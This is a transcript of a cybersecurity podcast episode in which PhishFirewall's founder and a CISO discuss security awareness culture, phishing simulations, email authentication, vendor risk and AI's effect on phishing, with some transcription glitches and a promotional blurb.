Phishing For Answers

Phishing Gone Wild: Tales from the Trenches

Joshua Crumbaugh, Founder & CEO of PhishFirewall

Send us a text

Kevin Walsh joins us to share his wealth of experience in cybersecurity and the crucial role of human elements in security strategy. The discussion touches on compliance, phishing simulations, and the impact of AI in the realm of cybersecurity. 

• Importance of understanding human behavior in cybersecurity 
• Compliance: Balancing act between requirements and effective security 
• The security culture: Building a proactive environment 
• Phishing simulations: Making training relevant and effective 
• AI's role in modern cybersecurity landscape 
• Vendor security: Addressing the weakest link 
• Strategies to engage all levels of staff in security practices 

Thank you for listening! If you enjoyed this episode, please consider subscribing and leaving us a review. 


Joshua Crumbaugh is a world-renowned ethical hacker and a subject matter expert in social engineering and behavioral science. As the CEO and Founder of PhishFirewall, he brings a unique perspective on cybersecurity, leveraging his deep expertise to help organizations understand and combat human-centered vulnerabilities in their security posture. His work focuses on redefining security awareness through cutting-edge AI, behavioral insights, and innovative phishing simulations.

PhishFirewall uses AI-driven micro-training and continuous, TikTok-style video content to eliminate 99% of risky clicks—zero admin effort required. Ready to see how we can fortify your team against phishing threats? Schedule a quick demo today!

Joshua Crumbaugh:

Hello and welcome to another episode of Phishing for Answers. Today we've got Kevin Walsh with us. Kevin, tell us a little bit about your background.

Kevin Walsh:

Background-wise, I got started in cybersecurity through network and system administration, but before we had a formal cybersecurity group in most companies actually and through that I went into infrastructure and infrastructure management and from there I specialized in security and then became exclusively cybersecurity.

Joshua Crumbaugh:

Okay, very good.

Kevin Walsh:

People come to cyber from different directions. Sometimes it's from GRC, sometimes it's from GRC, sometimes it's from Red Team. For me, it's more the security engineering area Awesome.

Joshua Crumbaugh:

Yeah, no, mine was a little bit different too. I mean, I guess I started out in IT as well, just didn't come into cybersecurity because of the security around IT, come into cybersecurity because of the the security round it. Um, I just one day was uh researching and came across penetration testing and said, oh I'm gonna do that, and and it just sounded fun, and I was, I was bored with my current job at the time, and so, and, uh, that that's how I ended up in it physical pen testing did.

Joshua Crumbaugh:

I did actually just about every type of penetration testing in my career. Now, a lot of it was physical with social engineering, breaking in the middle of the night, stuff, like that. But I also, when I worked for the federal government, almost that entire time was spent on their application security side of things. So testing all the applications before they would be rolled out to the public, just to see if there's any vulnerabilities and help them correct them.

Kevin Walsh:

Yeah, app security is another major area.

Joshua Crumbaugh:

Yeah, yeah, yeah, and there's a lot less travel with application security. So my experience is a lot of red teamers start off in the network and love it, but they'll get a little bit wore out by the travel and decide, hey, I'm going to go do application security for a while, because that's what happened for me anyway.

Kevin Walsh:

Physical pen testing is a lot of travel too, but it's often a lot of fun.

Joshua Crumbaugh:

Oh, it's a blast. I mean some of the things that I got paid to do.

Kevin Walsh:

Did you ride any elevators Topsoil elevators, oh all kinds.

Joshua Crumbaugh:

But I think one of my favorite stories was an NBA game where we watched the game from the operations center, you know, hanging out high-fiving the general manager of the team. No one's asking us why we're there, because we had pretexted our way in ahead of the game and just said that, you know, we were backup support for the Jumbotron no joke. Now we had the name of the company and we printed these little fake business cards and we'd figured out how it worked and that it was mostly contractors. So there's a little bit more to it. But yeah, we just said, hey, we're here for the Jumbotron and interestingly enough, it worked and we were able to watch that game.

Joshua Crumbaugh:

But I mean just stuff like that. I mean getting paid to do it. It's insane. That was fun for me too. Yeah, for me, though, that was also what really built the passion around the human element. I mean, you do any physical pen testing. You're going to have a human finding on just about every single report, and you know when I would do that and talk to different you know business leaders about the human problem. They would say, well, we're already doing everything that you know XYZ frameworks tells us to do? What else are we supposed to do here? And I looked at the industry and just said you know, we really do need to figure out a better way. And it was really, I don't know, exacerbated when I tailgated in off the same guy four years in a row and I'm like are you kidding me? Does anyone read these reports?

Kevin Walsh:

That sounds like a little bit of checkboxing there.

Joshua Crumbaugh:

So yeah, yeah, no, I think it was like a little bit of checkboxing there, yeah, yeah, no, I think it was definitely a little bit of checkboxing and I mean to me that's often the problem with compliance. Is that because 90% or 70% of your time as a cybersecurity leader is spent around those compliance requirements, leader is spent around those compliance requirements. They're often looked at as the you know, the finish line instead of what they really are, the starting line. But I mean audit and GRC. I mean, well, you tell me you were heavily regulated, at least I imagine, with PCI, right At the last place.

Kevin Walsh:

Yeah, so I imagine that took a lot of your time.

Joshua Crumbaugh:

Yeah, did it take up a lot of your time.

Kevin Walsh:

It did. When I was strictly security engineering, no, but as a CISO, yes, it does and it's important. We shouldn't downplay it. But PCI and SOC2, they're really subsets of best practices, things we know to do already. So if you're implementing best practices, then you should just be after that checking off boxes and doing the paperwork properly. If you're implementing things because of one of these compliance tasks, then you're definitely behind. They're behind best practices already. They're at least three and four years behind what we know we should be doing already.

Joshua Crumbaugh:

Oh yeah, the frameworks and the compliance standards. They don't keep up. I think the best example is I don't think any of the training requirements address AI yet training requirements address AI yet they're starting to address AI and other elements, but I haven't seen a single training requirement that says, hey, you need to train your team about AI and privacy and the data around it.

Kevin Walsh:

I don't know what's really changed with AI, other than the adversary getting better, though, if it appears to be a person, it appeared to be a person before, and a lot of the things I dealt with five and six years ago were early forms of AI.

Joshua Crumbaugh:

I mean agreed there, although I think it is better now. Oh, it sure is what I was getting at. There was more on, I guess, on a different side of it. But you know what I lost my train of thought there. What changed with?

Kevin Walsh:

AI, I think was the scale, the ability of actors to scale.

Joshua Crumbaugh:

That's where I was going. Is that I was going to mention that with AI, the biggest thing that's changed is that everyone's using it. Before, no one was using it and I didn't have to worry about my users uploading sensitive information or PHI or something like that into one of these systems. I think now, if I don't give them a system, they're going to use one A and B. It's just all the more risk about data privacy and I think things around like that when it comes to AI. At least that's what I'm concerned about.

Kevin Walsh:

Right and it's difficult to enforce policies. Although there are ways to do that, especially if you have zero trust and tight control of your clients and a good MDM, you can start to get a handle on AI usage in your company. Otherwise, there's not much you can do. Even when you do have that handle, people, of course, are using it on their phones. Oh, absolutely, this is the reality of the world and I don't think we should be fighting that.

Joshua Crumbaugh:

Oh, I agree. I think that's why we need to embrace it, give them ways to use it safely, because, you're right, if we do fight it, then they're on their phones doing it anyway. So better to give them a way to utilize those tools in a safe and secure manner.

Kevin Walsh:

Right, that's the key is you give it to them in a way that is very beneficial to them. Getting an enterprise account for them is very beneficial, especially here. It is. Go ahead and use it and then you can monitor it if you want.

Joshua Crumbaugh:

Yeah, oh, absolutely. But more importantly, with an enterprise account, your data is not being fed back into the model to train it, whereas with almost every personal account, your data is being fed back into the models to train it.

Kevin Walsh:

And you have to trust the company that they're not training off of it too, or they're like well, you have to train it and you have to trust the company that they're not training off of it too Well.

Joshua Crumbaugh:

you have to trust any Well I mean. To that regard, I don't trust any of them Well in cyber.

Kevin Walsh:

I would say don't put anything into any public AI. You should be using only private AI.

Joshua Crumbaugh:

I agree, I mean and that's sort of my point but and I really do We've seen so many times when these big corporations and I'm not saying any of these are, you know, ignoring the requirements or what they say. But you know, we've seen so many times where you know, these massive tech companies have got, you know, said one thing and then got caught doing another. And that's my concern, because the more data they have, the better, and when we live in a day and age of data, I feel like there's a lot of temptation to just include other data in there.

Kevin Walsh:

Yeah, getting it, getting an idea of your spreadsheets for you and your pivot tables, is certainly highly productive, but you need to give a private one or an enterprise one to do that.

Joshua Crumbaugh:

Yeah, no, I highly productive, but you need to give a private one or an enterprise one to do that?

Kevin Walsh:

Yeah, no, I that's incumbent on getting your management to do that and your infrastructure people to enable that.

Joshua Crumbaugh:

Well, you know one of the concerns that I've had around that specific thing. Okay, so let's say we create a corporate AI, how do we now apply role-based access controls? Because if I put enough data in that to make it helpful for multiple departments, there's certainly a need to restrict some bit of data from one person and give it to another person. So that's one of the things that I've been wondering about is how do we apply these within a large language model?

Kevin Walsh:

Yeah, I've never done a deployment of a private that large, so in the last couple gigs I've had we've done it really just for the cyber team in a shared model.

Joshua Crumbaugh:

Okay.

Kevin Walsh:

Went ahead and got enterprise AI for the larger organization for different departments.

Joshua Crumbaugh:

So they were using it as like a blue team assistant, or how was the cyber team Really just?

Kevin Walsh:

to do paperwork as well. I mean any that's fair, any of our work like that. It's not like we don't have paperwork to do. And it can make short work of a lot of things, especially doing reports, kpis and OCRs and things like that. It can do very short work of that. So it's a good productivity booster. No matter what, no matter how you look at it, it just has to be used safely.

Joshua Crumbaugh:

Agreed and there's a lot of ways to do that and we're seeing more and more really intelligent models that can be deployed locally on your machine and I'm really excited, like last week we saw that one model that was trained at, you know, one 11th of the price. That, or the cost of all these other models, is really small. It's scoring up there with, you know, gpt 4.0. But things like that, I think, are how we solve the privacy concerns, are with more edge, ai and I'm sure someday somebody will figure out how to do role-based access controls inside a large language model. But until then I imagine we'll probably put controls around the large language model.

Kevin Walsh:

So at CES, nvidia gave an excellent presentation where they showed AI-enabled, very powerful boxes powered by their chips that were $3,000 for one-off. That could easily.

Joshua Crumbaugh:

Yeah, I was just commenting on Facebook this morning when one of my friends posted it there and I was just thinking, wow, supercomputer on my desktop for $3,000. And I was just thinking, wow, supercomputer on my desktop for $3,000.

Kevin Walsh:

Or just a big NVIDIA card inside a server or a desktop. Particularly, servers, if you have a private cloud, are a great way to go. Oh, absolutely, especially if you want to do anything with images. It becomes very expensive and very compute intensive. But being able to scan images and have the AI interpreting images is a big benefit and it's a big leap from not doing that, being just text-based, to doing that. So that really requires some horsepower and it looks like NVIDIA is stepping up and, as an early investor of NVIDIA, I'm very happy about that.

Joshua Crumbaugh:

I mean, hey, when there's a gold rush, sell shovels. And well, NVIDIA is selling shovels, aren't they?

Kevin Walsh:

I thought I was investing in for their gaming ability, but I had no idea that in 2003 that AI was going to come along.

Joshua Crumbaugh:

Yeah, yeah. No, that's a phenomenal investment. I'm sure it's done really well for you.

Kevin Walsh:

I never look at it.

Joshua Crumbaugh:

You're alone or something. It's ridiculous, so they're doing really well for you. I never look at it. You're alone or something. It's ridiculous, so they're doing really well. Yeah, so let's you know, shifting subjects just a little bit off of AI, what's your opinion on culture? And when I say that, I like to start with just a simple question If you had to pick one, what would it be? Carrot or stick, and then we'll dive into more of how we build culture and different things like that, but I like to start with that question.

Kevin Walsh:

It's always carrot Stick is in the background and if you're at any professional company with high-level professionalism, the sticks should be in the background and the carrot should be in the foreground. Always Everyone knows the stick is there. You're there to do your work and to do it right and to follow policies and company guidelines, so you shouldn't have to question whether the stick is there, but the carrot's really what's going to move things forward. So I'm definitely for carrot for that.

Joshua Crumbaugh:

I'm a big team carrot guy myself. So, no, I agree with you that we got to lead with kindness, and to me, it's about creating that culture that we want. I can't force it down your throat to just make you more security aware. That's never going to work, beating you. To make that happen, I have to make you care, and in order to make people care to me, we have to lead with empathy. We have to start with why there's just a few things like that that really help to change that behavior.

Kevin Walsh:

Well, if you're a CISO, you're preaching to the choir. Your team is already very security aware and very pro security. It's a matter of how do you get that company that you're in to change, and that usually starts with the company leadership. There's no two ways about that. If the leadership is on board with security and willing to make an investment in it, then you've got the wind at your back, that's for sure. And when you're talking about changing a company's culture or affecting it, you're usually affecting leadership, because it is certainly top-down.

Joshua Crumbaugh:

Oh, 100%, every bit of. I mean all of the best security awareness programs I've ever seen. They start at the highest level of the C-suite and I mean I can even tell, like with clients, when they kick off. If the CISO sends the announcement to the whole company, it's never going to be as effective as if the CEO sends the-.

Kevin Walsh:

Everyone's aligning themselves with the company and where it wants to go, with that executive team and that executive team If they're talking about that, if they're doing it themselves as an example which is excellent, and it's certainly not being a counterexample, that's for sure and then you know you've got your, you can know you can, you can start implementing your programs. Start doing good work.

Joshua Crumbaugh:

I agree, and that that is to me where culture typically does go wrong. But you know, outside of getting the C-suite buy in, what are some tips that you might have on building a positive security awareness culture?

Kevin Walsh:

Definitely not be punitive. So sometimes I've entered into a company where there was punishments for people when they failed phishing tests and things like that. We should never be punitive in that way. That's why I'm really more pro-Karen. We're going to have more and more people. We don't want people to have a security issue and then not report it. We want them to have more and more people. We don't want people to have a security issue and then not report it. We want them to report it with alacrity. So we want to be clear that anyone can be fooled, especially in the age of AI. Now it's much easier to communicate that and see something, say something, should always be one of the guidelines of the security group, and there should be no penalty for talking about security issues. It should be confidential always, of course, but we should encourage people to speak up and to not be afraid to do so. So having a culture of maybe even reward for that definitely helps out and helps get people on board.

Kevin Walsh:

Going back to getting the C-suite on board, though, what I've noticed lately is that if your, if your company, has partnerships and every company does sometimes it's subcontractors, sometimes it's peer partners People are finding that supply chain is a major vulnerability now.

Kevin Walsh:

It's not just how tight your company is, it's how tight your partners are, how tight your suppliers are the people you're actually doing business with. So more and more now we're finding that partners and contractors are getting pushed, or pushing companies, into getting their security in line. In other words, we don't want to do secure email with you unless you've already got your email set up to a certain standard. Yes, you know, and you know like I thought that's what we were going to mostly talk about fishing on the podcast, but wherever you want to go. But in setting up email, in many cases you want to divide the trusted sources from the non-trusted sources and those trusted sources have to meet certain standards and sometimes you get pushed. In my earlier part in my career, some major contractors like Disney and Google were pushing some of the smaller firms I was working with into getting their security in line so that they could be a contractor and win contracts with them, so that easily gets the ownership on board and getting security together and not just in a checkmark fashion.

Joshua Crumbaugh:

Oh yeah, I mean I can't tell you. I mean I've got stricter requirements from my clients than I ever do because of compliance requirements, and it's funny when I look at the requirements that some of my clients have, they're stricter and they ask questions that often these frameworks don't ask. So, no, I definitely think that that's an area that will help people a lot and, yes, I do love to talk about phishing and so, along those lines, what sort of do you? Well, what's your approach, rather, to phishing within the enterprise Phishing?

Kevin Walsh:

prevention. Well, I think it starts with getting your email and messaging set up and, let's face it, it's not just email anymore, it's various forms of messaging and doing things like. In some cases we should be leading the Googles and Yahoos of the world, but you know they're a DMARC equals reject now, and everybody frankly should be, and I think it's only I think it's still a minority of companies, fortune 1000 companies that are DMARC equals reject, and I think that's sort of a minimum. Now we should only accept properly formatted email from proper servers. I mean, we just have to get our game together here and setting that up first, and then getting your secure email gateway, partnering with the vendor and let's face it, we don't make this stuff ourselves. It's always a partner we have to go with with uh, the minecast, the proof points, the semantics, the cisco's of the world, um and uh working with that and implementing that properly. And then training, of course, uh, getting getting users trained, because plenty of these um, remote access programs, these rats get get through most of our secure gateways. Frankly, they're designed to get through them so they can through a number of techniques encryption, you know. Encryption after the link, before the link. So you know we do have to get you know, have our training in place there.

Kevin Walsh:

And one of the things I've always thought and I want to know what you think about this is that to some degree, the email system inside a company is now a system of record. It's like memos used to be. I don't know if you've ever been in a company that had actual memos that got passed around happening. So some of the places I interned at they had memos which were inside these packets with multiple signatures on it and you, you know you would. That's what get.

Kevin Walsh:

Get the memo is. It's almost just a phrase now that no one knows where it came from. So there was an internal communication system of record and when email came along, nobody thought about it, nobody designed it or planned it. But the internal system of record became coupled to a completely open outside system as well, which is where the real heart of the issue is. So our internal record system as we talk to one another inside a company is attached to basically like the same thing as a junk mail system, as the postal system where anybody can send anybody anything. And I don't think if we were to set it up and deliberately, we would ever design it that way and we should start thinking a little more about does every employee need to get an address where they can get email from anyone?

Joshua Crumbaugh:

well, you know, I would say we have things like teams, but most companies I look at still allow phishing to their teams. It's a simple configuration. That's right, but more often than not, when I look that setting has not been changed and so you can phish directly to somebody's Teams account. But I do think that that's a very accurate observation and certainly part of the reason that we're vulnerable and it's not just the company. I mean, email made it to where that threat existed in our living rooms, in our houses, and so it really.

Kevin Walsh:

Email has reshaped how the scammers and the con artists and the general bad guys and the nation states, how they get at us and how they're able to uh, to target us, um well, they they can, because they have a direct way into every person at every company, at most companies anyway uh, which is something you wouldn't set up if you had a choice to do so. You know, and that's kind of the heart of where this came from. And, of course, the bad guys are just going to pick the weakest spot.

Joshua Crumbaugh:

every single time They'll pick another spot, by the way, oh 100%, and the bad guys are always going for your weakest link, the weakest link, the low hanging fruit in general, and so I don't know. I think that you know To me. I get it that it's an engineering issue, but we do have things to help deal with that. So you know, we have the external sender notification and that needs to be something that employees really, really understand well enough to pay attention to it, and I know that a lot of employees ignore it because they don't understand why it's so critical.

Kevin Walsh:

It becomes numbing. That's what we do, so we have a default open and I wonder if we should change it at some point to default closed.

Joshua Crumbaugh:

I can't imagine the volume of workload that would hit the desk day one. If you do that, though, Well, it'd be it would.

Kevin Walsh:

It would be less phishing. But, it would depend on the type of company. If you're a defense contractor, do your engineers need to get external mail? They're not, if they're not interfacing with anything but specific partners.

Joshua Crumbaugh:

I don't, but I don't know that that solves the problem, because when I look at the fish that are getting through the filters, nine out of 10 of them are coming from a compromised server or a business email compromise at least what I'm seeing. And so all of those are still going to sail right through because they're already a trusted server. And I mean that goes to the vendor issue that you were talking about earlier and how we're only as strong as our weakest link, and I'll tell you most of the companies that I know that are really secure on their side, if they do have a phishing incident that even gets remotely close to being anything, it is because a vendor got compromised and they trusted that vendor.

Joshua Crumbaugh:

That's right, and that is, I think, one of those areas that often our general staff don't necessarily realize as much as they need to, that you know you are going to be targeted and, more importantly, your vendors will get compromised. It's not a matter of if, but when and who. And when they do get compromised, they're going to try and change a little detail here, a little detail there, to reroute some money, and I think it's just. You know, to me it's a lot. It's largely a matter of making sure the right people in our organizations know about all the different scams that they're going to face, and when we get better awareness, we have less of a threat, because they're less likely to fall for it. But to me, that's why we run phishing simulations though. So let's talk about phishing simulations. What are your thoughts on phishing simulations and and what's your approach?

Kevin Walsh:

I like them to be as realistic as possible, without naming any names, though we've gotten some trouble over that, so in one case, we sent out some uh some mails that were quite realistic uh, really to induce people to click, of course and, uh, one of them was that there's been some mistake in your paycheck that one really works usually very well or something having to do with their employment. We sent it to a UK subsidiary, though, and they claimed that it had traumatized several hundred of their employees. It was a very successful phishing test.

Joshua Crumbaugh:

I mean, I just looked at it as this was a good one, but they did not look at it that way. No, I mean, I think that's an issue. Actually, that's a question I often ask on this podcast is have you ever had anyone get upset as a result of a fish?

Kevin Walsh:

Yeah, we've had some of those and in some cases they weren't vetted outside of the training group and maybe something like that would have been caught and we could have given a heads up to the HR. That would have worked out a lot better. But in some cases I think that you know the bad guys aren't going to have any compunction about doing such things. So we really do have to do as realistic as possible fishing simulations, especially if we're going to accept mail from any source.

Joshua Crumbaugh:

Yeah, I have a few thoughts there. Number one I. I, I've had the same thing happen. Uh well, I've got a million stories cause I, I've got a lot to yeah.

Joshua Crumbaugh:

Close to a hundred million fish in my uh, in my career. So I've got stories of upsetting people as a result. Uh, but what I realized was I don't ever want to upset somebody. That's not why I'm there. That's not why I'm fishing them. I'm fishing them because if I can show them how urgency is used against them, then they might learn about urgency. And if they learn about urgency, really well, they're going to start to notice it from a subconscious perspective and it'll just be a red flag that'll help them move on.

Kevin Walsh:

And so if you get an emotional charge or hit out of the email, that should be the first thing that sets you up with a question.

Joshua Crumbaugh:

Oh, agreed, and so I'm training them that on these different tactics. That's why I fish them, and I don't ever want to get them upset, and so I think this is where gamification really works well. And I say that because what I realized was that we can, with users, tell them we're going to phish them ahead of time, say, hey, let me tell you about a phish that pretends to be from your payroll department, and now be on the lookout, because the next time you see it it might be us or it could be the real bad guys trying to target you. And you can even highlight how this is based on a real email that targeted somebody from their organization. And to me that's a better approach, because now, if they click, you already warned them, they're not upset, you de-weaponized it and, more importantly, you've made a game out of it. So I think there's ways that we can change our strategy around phishing to make it less invasive for the users or maybe invasive isn't the right word Less, I don't know, angering.

Kevin Walsh:

If you have a phishing program. I think they do feel proud when they find the phish. So I think that gamification has been going on for quite a while now and it really is productive. People just really love to find the phishing emails. I remember setting it up to train them find at least five different things inside this email With AI. Now we're not going to have a lot of spelling errors, unfortunately. I mean that was that was it.

Joshua Crumbaugh:

No, I mean, that's that's done. In fact, I would argue that spelling errors indicate that it's not a fish yeah, it's the opposite now.

Kevin Walsh:

So we got, we have to change our, our training, of course, but uh, yeah, gamification, I I would agree that that.

Joshua Crumbaugh:

That makes it fun, it makes it interesting uh and it gives us an opportunity to praise the user when they do something right.

Kevin Walsh:

Yeah, it's participatory, so you're part of it and people want to. You should make security something that somebody is happy to be a part of. That being members of the team and I think this is the most rewarding thing for any employees that always feel like they're contributing or being part of or a member of team and just make sure you sure they're all a member of your team, they're not fighting your team. Definitely.

Joshua Crumbaugh:

Yeah, no. And I think we need to be the department of yes, but right, can we do this? Yes, but let's put some guardrails around it and make it a little bit more secure. Right versus the department of no. And I've seen, you know, it's so easy to become the department of no where we can't do that, we can't do that and that, you know, doesn't make us many friends when we're the department of no, and you know, if we're going to find all of those vulnerabilities that just exist within the human layer alone, that requires conversations, because your audit isn't going to find out about that insecure practice that your accounts payable team has, or whatever it might be. And so I think there's a social aspect of just leader cybersecurity, leadership in general to even be able to fully understand all of your vulnerabilities. Yeah, yeah.

Kevin Walsh:

Oh, and another critical thing about is to have all of your backup security set up there too, because eventually people are going to fail. So you're going to have to have your EDR, you're going to have to have your multi-factor set up, because usually they're looking for credentials and it comes right down to it. So having especially physical multi-factor, multi-factor coming through the email is getting to be a little weak. We should probably be using more and more biometric and physical devices and perhaps pass keys, and people are looking for more and more solutions.

Joshua Crumbaugh:

I'd like to see more people accept and and support pass keys myself.

Kevin Walsh:

Yeah, this, this recent issue with power school which has affected me personally. I got two kids in in elementary school.

Joshua Crumbaugh:

I'm not telling me about it.

Kevin Walsh:

Power school is a system used I think it's used all the way up it's K through 12 in the US that has the grades and lets the parents see the grades, teacher comments and also things more private. Well, of course, the kids' grades are very private. Anything about a child, a minor, is private. But it can have other things like trouble that child's having special education, things like that.

Kevin Walsh:

They had a major breach. They had a major breach last week and we all got notifications and it seems as though they compromised a customer service rep and I don't see how it's and of course, it was typical. We don't know a whole lot about it because they haven't said a lot. They just reported it, as they're required to do, but it looks like phishing and some credentials of a customer service rep that went in to service the system when it was having issues. So this is a person with privileged access and most of the things I set up you're not able to do that because you don't have any multi-factor should prevent some of this. Privileged access management should prevent a lot of this, but somehow they made it through those other layers.

Joshua Crumbaugh:

Yeah, I will say, one of the ways that I see them getting around multi-factor more often than anything else is through consent phishing. And to me that's one of the worst attacks lately, because more often than not, when somebody's like well, how'd they get in? Because more often than not, when somebody's like well, how'd they get in, that's where it is, because somebody just said authorize application. Because they're so used to clicking through those Google and those Microsoft authentication screens.

Kevin Walsh:

We'll find out eventually, I think, probably a little more about the PowerSchool hack.

Joshua Crumbaugh:

Be interesting.

Kevin Walsh:

Yeah, yeah, but having that multiple layers of defense behind there is always going to be critical. There's that front line.

Joshua Crumbaugh:

Yeah, I think those defenses should even take into account who your chronic clickers are, or whatever we want to call them. And that's where I think, if we're running the program right, we're going to isolate those users that click on everything. They're going to be in sales. They're going to be in a more secure network. They're going to be in sales In a more secure network. They're going to have less access in your PAM solution.

Kevin Walsh:

All these things to make sure that, even if they do click, it doesn't matter, right, and people working in cyber and infrastructure with privilege access need to be much, much tighter than the other group, oh yeah, don't want to see one of my own team members showing up in the phishing reports, for sure, right and there shouldn't be a lot of uh, you know, external email going back and forth.

Kevin Walsh:

A lot of these teams are mostly internal, although of course you do have to work with vendors. Like I said, we're partnering with vendors for security all the time, uh, but nevertheless those should be the tightest control and your salespeople aren't going to have as many controls. They're out there. In some cases they're the frontline of a company.

Joshua Crumbaugh:

They're frontline soldiers of a company, but they're going to have less access to they're going to have no access. They need access to your Salesforce and maybe a few marketing tools. That's right. Access to your Salesforce and maybe a few marketing tools, that's right. So they don't need nearly the level of access as other people. So if they get caught. What's your competitor going to get? Some marketing materials?

Kevin Walsh:

Oh well, Well, that's true, but you have to be careful that they don't have access to sales data. They need to protect that in particular. Oh yeah.

Joshua Crumbaugh:

Customer lists and things like that are costing, right? You know what I found interesting when I was in application security, I guess rather when I later founded a SaaS company, because when, when I was in application security, I hadn't really thought about it. And so we would do all of these different tests against these SaaS companies and, more often than not, their SSO would give away their entire client list, and so when you would type in an email address, it basically give you three or four different responses. One response would say hey, this email address exists in our system. Another one would say this domain exists in our system, but the email address doesn't exist in our system. And another one would say this domain exists in our system, but the email address doesn't exist in our system.

Joshua Crumbaugh:

And another one would say you know, this domain exists and their SSO is set up, and give you a redirect URL, and so you could go into almost any one of these and it's starting to get better. Now you could go into most SaaS companies and you could enumerate their users. And it was when I became a founder and a CEO that I realized wow, that's really really valuable data that we were putting in most reports as a low information disclosure when a client list, that's not a low, that's a critical finding for any SaaS company anyway. So just something that I think there's certain things that you don't necessarily see when you're more junior in those roles that you see as you get more and more senior, and I don't know if there's a good way to solve that, but it's always an interesting observation for sure.

Kevin Walsh:

Is it interesting. What do you think about obscuring easily guessable email addresses, especially for leadership?

Joshua Crumbaugh:

Oh, I absolutely think that you should, and I think that their easily guessable one should really be used as a honeypot.

Kevin Walsh:

That was exactly what I did two gigs ago. I made those honey pots and said listen, if you're going to be in leadership in this company, I don't want you to have an email address. That's easy.

Joshua Crumbaugh:

Yeah, so it has to be obscure, something no one would ever think of. It's mainly because our executives were getting hit so hard. Oh yeah, I mean I look at how I get hit every single day and I mean I can only imagine the bigger your company, the worse it gets, especially in finance, right? But yeah, I mean the second. I mean we could have a new intern start and I will get a fish about that intern within minutes, and so I got to imagine it's the same for pretty much any company out there that the same things are happening to them. So I think the problem is only going to get worse. With AI, oh well, I saw a study that said that Amazon had seen a 700% increase in attacks last year, and it wouldn't surprise me, but there's only one thing that would explain a 700% increase in attacks in 2024. And that's AI.

Kevin Walsh:

Right yeah.

Joshua Crumbaugh:

Yeah, I would attribute it to that too. You know, the other thing that I'm worried about I guess a little bit is that novice hacker that we didn't have to worry about before. They're not terrible, they're not great, but they're novice right. They're right in the middle, and now they have these tools that can make them as good as an elite hacker, just like that.

Kevin Walsh:

Is that any different than before, though? We've always had the script kitties. We've always had them.

Joshua Crumbaugh:

Ah, but the script kitty now knows how to run all the tools, or if they know how to ask the right questions.

Joshua Crumbaugh:

So what I think is it levels them up. And I had taken there's this tool called Open Interpreter and I put it into Kali Linux and I did some penetration testing on a lab network and I said, okay, well, you know, go and do this. And it didn't do it that well, but it did it. And then I said, okay, well, now let's combine my knowledge with its knowledge and I say, okay, use this tool and go and do this. And it actually used flags on the tool that I had never even used or rarely used, and it was just impressive at how well it was able to use the tool that I had never even used or rarely used, and it was just impressive at how well it was able to use the tool. And so that, to me, is where it gets. Dangerous is when you take somebody that knows a little and you give them access to a tool that can act as a force multiplier for their little bit of knowledge that they do have.

Kevin Walsh:

That's right. It's the same issue as before, it's just greater.

Joshua Crumbaugh:

Yeah, everything Exactly. It's just a force multiplier for the bad guys, unfortunately.

Kevin Walsh:

It is quite remarkable what an AI will do when given a tool though. In other words, you realize how you thought you were an expert in a tool, but you were not. Oh yeah, once you have a genetic AI, words it. You realize how you thought you were an expert in a tool, but you were not.

Joshua Crumbaugh:

Oh, oh, yeah, you have a genetic.

Kevin Walsh:

Ai, you, it's. It's going to use things in new and interesting combinations that you hadn't, uh, even thought of before, no one had thought of. Yeah, uh, because it doesn't have the preconceived notions that we do that this is, this is how this this ought to work. Uh, so, yeah, that that's, that's an issue coming up. Uh, it's. It's certainly plenty of work for us ahead. Let's put it that way.

Joshua Crumbaugh:

Yeah, I'm building a pen testing agent right now and it has an entire like every bit of Kelly in a database with all the man files and everything and it's interesting, like you said, it's interesting the way it uses tools because you're 100% right tools Because you're 100% right, unless it's it's almost exactly what you know. A popular tutorial says it's going to use it in an obscure way, so it's yeah. Well, we are running low on time here and before we wrap up, I want to ask you if you have any tips when it comes to building out security awareness programs, just top best practices that you would recommend for somebody.

Kevin Walsh:

Well, number one, of course, is getting your leadership on board with it, Especially and communicated through your HR or whatever your communications channels are inside your company. As soon as everyone knows that this is a major push by the company and what they want to do, they're definitely on board with it and, like we were talking about with carrot and stick, it should be pretty much all carrot. This is something we want you to pay attention to. This is something that's fun, this is something that's interactive and it's also going to not only benefit you. One nice thing to do and a lot of training companies offer this is to let them not only use it themselves, but let their family members have some benefit to it. In other words, share some of the training videos with members of their family. This really does reward the employee and they seem like then they become the expert in their world through your company by enabling them, so it just encourages them to be better at it.

Kevin Walsh:

You know, in some ways, and that you know, I work for a high-tech company or a company that is interested in security, and now I'm going to get a brother and sister and uncle and aunt involved in this also, because I know that they're having issues also. So this is a great way to encourage people also. So, also, we should be covering all aspects. Not just you know email and messaging security, but also physical security, and you know security over the phone and just different ways that we all know you can do social engineering with and have people simply aware of it, and this is another thing that they can communicate to their friends and relatives. And it's a. It's a. It's a multiplying effect when you do training properly and in a way that people are enthusiastic about it.

Joshua Crumbaugh:

You know, I saw a study that said that when you make training contextual to somebody's role within the organization, that it makes it 15 times more effective. So when you say it's a multiplying effect, I would imagine the number is 15x, because while it's not making it contextual to their role in their organization, it's making it contextual to their life and it's connecting the dots to the threat that exists at home. So it's not just them protecting, you know, the corporate overlords, it's them protecting themselves, and I think that that really does sort of bring it home. So that's really great advice that you give. Well, thank you for joining us today. Any final words?

Kevin Walsh:

No, just thank you very much for having me. It was great talking and great really learning about you and what you do and your thoughts as well.

Joshua Crumbaugh:

Yeah, thank you so much for being here. It's been an absolute pleasure For those of us joining us remotely. We will see you again tomorrow, thank you, thank you.